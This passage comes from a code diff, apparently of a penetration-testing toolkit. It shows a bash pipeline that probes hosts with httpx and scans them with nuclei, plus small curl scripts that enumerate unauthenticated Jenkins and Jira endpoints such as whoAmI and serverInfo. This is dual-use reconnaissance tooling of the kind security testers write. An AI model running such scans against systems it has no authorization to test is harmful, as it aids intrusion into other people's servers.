base="$outdir/httpx2nuclei_${ts}"
mkdir -p "$base"
# Probe
if [[ -f "$input" ]]; then
httpx -silent -l "$input" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -json > "$base/httpx.json"
else
printf "%s\n" "$input" | httpx -silent -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -json > "$base/httpx.json"
fi
# Extract URLs
python3 - "$base/httpx.json" > "$base/urls.txt" <<'PY'
import sys, json
urls=set()
with open(sys.argv[1], 'r', errors='ignore') as f:
for line in f:
try:
o=json.loads(line)
u=o.get('url') or o.get('host')
if u: urls.add(u)
except: pass
for u in sorted(urls): print(u)
PY
count=$(wc -l < "$base/urls.txt" | tr -d ' ')
echo "[+] Alive URLs: $count (saved to $base/urls.txt)"
# Auto severity selection
case "$sev" in
auto)
if [[ "$count" -gt 500 ]]; then severity=high,critical
elif [[ "$count" -gt 100 ]]; then severity=medium,high,critical
else severity=low,medium,high,critical
fi
;;
crit) severity=critical;;
high) severity=high,critical;;
med) severity=medium,high,critical;;
low) severity=low,medium,high,critical;;
*) severity=$sev;;
esac
echo "$severity" > "$base/severity.txt"
echo "[+] Nuclei severity: $severity; tags: $tags"
if [[ "$count" -gt 0 ]]; then
nuclei -l "$base/urls.txt" -tags "$tags" -severity "$severity" -o "$base/nuclei.txt" -silent || true
nuclei -l "$base/urls.txt" -tags "$tags" -severity "$severity" -json -o "$base/nuclei.json" -silent || true
# Summarize JSON by severity
if [[ -s "$base/nuclei.json" ]]; then
python3 - "$base/nuclei.json" > "$base/summary.json" <<'PY'
import sys, json, collections
sev=collections.Counter(); total=0
with open(sys.argv[1],'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line); total+=1; sev[(o.get('info') or {}).get('severity','unknown').lower()]+=1
except: pass
print(json.dumps({'total':total,'by_severity':sev}, default=lambda o:o, indent=2))
PY
echo "NUCLEI_JSON: $base/nuclei.json"
echo "NUCLEI_SUMMARY: $base/summary.json"
fi
echo "[+] Nuclei output: $base/nuclei.txt"
else
echo "[!] No URLs to scan with nuclei"
fi
echo "[+] Pipeline completed. Base dir: $base"

10
bin/web/jenkins_quick.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <jenkins-url>" >&2; exit 1; }
echo "[+] Jenkins quick checks for $url"
curl -sk "$url/api/json" | head -c 200 | sed 's/.*/[api] &/' || true
curl -sk -I "$url/" | sed -n '1,20p' | sed 's/.*/[hdr] &/' || true
curl -sk "$url/crumbIssuer/api/json" | head -c 200 | sed 's/.*/[crumb] &/' || true
curl -sk "$url/whoAmI/api/json" | head -c 200 | sed 's/.*/[whoami] &/' || true

9
bin/web/jira_quick.sh Executable file
View File

@@ -0,0 +1,9 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <jira-url>" >&2; exit 1; }
echo "[+] Jira quick checks for $url"
curl -sk "$url/secure/Dashboard.jspa" | head -c 200 | sed 's/.*/[dash] &/' || true
curl -sk "$url/rest/api/latest/serverInfo" | sed 's/.*/[api] &/' || true
curl -sk -I "$url/" | sed -n '1,20p' | sed 's/.*/[hdr] &/' || true

Some files were not shown because too many files have changed in this diff Show More